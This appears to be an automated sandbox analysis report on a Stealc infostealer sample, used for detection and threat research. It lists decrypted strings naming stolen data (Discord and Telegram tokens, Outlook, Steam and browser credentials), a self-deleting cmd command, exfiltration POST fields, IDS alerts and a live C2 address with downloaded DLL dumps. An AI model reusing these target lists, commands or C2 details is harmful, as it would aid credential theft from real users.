Source: i3NmF0obCm.exe	String decryptor: Installed Apps:
Source: i3NmF0obCm.exe	String decryptor: All Users:
Source: i3NmF0obCm.exe	String decryptor: Current User:
Source: i3NmF0obCm.exe	String decryptor: Process List:
Source: i3NmF0obCm.exe	String decryptor: system_info.txt
Source: i3NmF0obCm.exe	String decryptor: freebl3.dll
Source: i3NmF0obCm.exe	String decryptor: mozglue.dll
Source: i3NmF0obCm.exe	String decryptor: msvcp140.dll
Source: i3NmF0obCm.exe	String decryptor: nss3.dll
Source: i3NmF0obCm.exe	String decryptor: softokn3.dll
Source: i3NmF0obCm.exe	String decryptor: vcruntime140.dll
Source: i3NmF0obCm.exe	String decryptor: \Temp\
Source: i3NmF0obCm.exe	String decryptor: .exe
Source: i3NmF0obCm.exe	String decryptor: runas
Source: i3NmF0obCm.exe	String decryptor: open
Source: i3NmF0obCm.exe	String decryptor: /c start
Source: i3NmF0obCm.exe	String decryptor: %DESKTOP%
Source: i3NmF0obCm.exe	String decryptor: %APPDATA%
Source: i3NmF0obCm.exe	String decryptor: %LOCALAPPDATA%
Source: i3NmF0obCm.exe	String decryptor: %USERPROFILE%
Source: i3NmF0obCm.exe	String decryptor: %DOCUMENTS%
Source: i3NmF0obCm.exe	String decryptor: %PROGRAMFILES%
Source: i3NmF0obCm.exe	String decryptor: %PROGRAMFILES_86%
Source: i3NmF0obCm.exe	String decryptor: %RECENT%
Source: i3NmF0obCm.exe	String decryptor: *.lnk
Source: i3NmF0obCm.exe	String decryptor: files
Source: i3NmF0obCm.exe	String decryptor: \discord\
Source: i3NmF0obCm.exe	String decryptor: \Local Storage\leveldb\CURRENT
Source: i3NmF0obCm.exe	String decryptor: \Local Storage\leveldb
Source: i3NmF0obCm.exe	String decryptor: \Telegram Desktop\
Source: i3NmF0obCm.exe	String decryptor: key_datas
Source: i3NmF0obCm.exe	String decryptor: D877F783D5D3EF8C*
Source: i3NmF0obCm.exe	String decryptor: map*
Source: i3NmF0obCm.exe	String decryptor: A7FDF864FBC10B77*
Source: i3NmF0obCm.exe	String decryptor: A92DAA6EA6F891F2*
Source: i3NmF0obCm.exe	String decryptor: F8806DD0C461824F*
Source: i3NmF0obCm.exe	String decryptor: Telegram
Source: i3NmF0obCm.exe	String decryptor: *.tox
Source: i3NmF0obCm.exe	String decryptor: *.ini
Source: i3NmF0obCm.exe	String decryptor: Password
Source: i3NmF0obCm.exe	String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: i3NmF0obCm.exe	String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: i3NmF0obCm.exe	String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: i3NmF0obCm.exe	String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: i3NmF0obCm.exe	String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: i3NmF0obCm.exe	String decryptor: 00000001
Source: i3NmF0obCm.exe	String decryptor: 00000002
Source: i3NmF0obCm.exe	String decryptor: 00000003
Source: i3NmF0obCm.exe	String decryptor: 00000004
Source: i3NmF0obCm.exe	String decryptor: \Outlook\accounts.txt
Source: i3NmF0obCm.exe	String decryptor: Pidgin
Source: i3NmF0obCm.exe	String decryptor: \.purple\
Source: i3NmF0obCm.exe	String decryptor: accounts.xml
Source: i3NmF0obCm.exe	String decryptor: dQw4w9WgXcQ
Source: i3NmF0obCm.exe	String decryptor: token:
Source: i3NmF0obCm.exe	String decryptor: Software\Valve\Steam
Source: i3NmF0obCm.exe	String decryptor: SteamPath
Source: i3NmF0obCm.exe	String decryptor: \config\
Source: i3NmF0obCm.exe	String decryptor: ssfn*
Source: i3NmF0obCm.exe	String decryptor: config.vdf
Source: i3NmF0obCm.exe	String decryptor: DialogConfig.vdf
Source: i3NmF0obCm.exe	String decryptor: DialogConfigOverlay*.vdf
Source: i3NmF0obCm.exe	String decryptor: libraryfolders.vdf
Source: i3NmF0obCm.exe	String decryptor: loginusers.vdf
Source: i3NmF0obCm.exe	String decryptor: \Steam\
Source: i3NmF0obCm.exe	String decryptor: sqlite3.dll
Source: i3NmF0obCm.exe	String decryptor: browsers
Source: i3NmF0obCm.exe	String decryptor: done
Source: i3NmF0obCm.exe	String decryptor: soft
Source: i3NmF0obCm.exe	String decryptor: \Discord\tokens.txt
Source: i3NmF0obCm.exe	String decryptor: /c timeout /t 5 & del /f /q "
Source: i3NmF0obCm.exe	String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: i3NmF0obCm.exe	String decryptor: C:\Windows\system32\cmd.exe
Source: i3NmF0obCm.exe	String decryptor: https
Source: i3NmF0obCm.exe	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: i3NmF0obCm.exe	String decryptor: POST
Source: i3NmF0obCm.exe	String decryptor: HTTP/1.1
Source: i3NmF0obCm.exe	String decryptor: Content-Disposition: form-data; name="
Source: i3NmF0obCm.exe	String decryptor: hwid
Source: i3NmF0obCm.exe	String decryptor: build
Source: i3NmF0obCm.exe	String decryptor: token
Source: i3NmF0obCm.exe	String decryptor: file_name
Source: i3NmF0obCm.exe	String decryptor: file
Source: i3NmF0obCm.exe	String decryptor: message
Source: i3NmF0obCm.exe	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: i3NmF0obCm.exe	String decryptor: screenshot.jpg

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EE9560 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_00EE9560
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EE94C0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00EE94C0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EE6C40 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_00EE6C40
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EF6DB0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	0_2_00EF6DB0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EEBFC0 memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	0_2_00EEBFC0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4E6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	0_2_6C4E6C80
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C63A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	0_2_6C63A9A0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C634440 PK11_PrivDecrypt,	0_2_6C634440
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C604420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	0_2_6C604420
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C6344C0 PK11_PubEncrypt,	0_2_6C6344C0

Uses 32bit PE files

Source: i3NmF0obCm.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: i3NmF0obCm.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: mozglue.pdbP source: i3NmF0obCm.exe, 00000000.00000002.1883896730.000000006C54D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: i3NmF0obCm.exe, 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: i3NmF0obCm.exe, 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: i3NmF0obCm.exe, 00000000.00000002.1883896730.000000006C54D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EEEDE0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00EEEDE0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EED1F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_00EED1F0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EF3560 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00EF3560
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EEB630 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_00EEB630
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EE1600 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00EE1600
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EEDB90 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_00EEDB90
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EF2B70 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00EF2B70
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EEE450 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_00EEE450
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EF31E0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00EF31E0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EED570 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00EED570
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EF2630 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_00EF2630

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.4:49730 -> 40.86.87.10:80
Source: Traffic	Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.4:49730 -> 40.86.87.10:80
Source: Traffic	Snort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 40.86.87.10:80 -> 192.168.2.4:49730
Source: Traffic	Snort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.4:49730 -> 40.86.87.10:80
Source: Traffic	Snort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 40.86.87.10:80 -> 192.168.2.4:49730

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://40.86.87.10/108e010e8f91c38c.php
Source: Malware configuration extractor	URLs: http://40.86.87.10/108e010e8f91c38c.php

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 02 Jul 2024 05:31:02 GMTContent-Type: application/x-msdos-programContent-Length: 1106998Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 02 Jul 2024 05:31:07 GMTContent-Type: application/x-msdos-programContent-Length: 685392Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 02 Jul 2024 05:31:08 GMTContent-Type: application/x-msdos-programContent-Length: 608080Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 02 Jul 2024 05:31:10 GMTContent-Type: application/x-msdos-programContent-Length: 450024Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 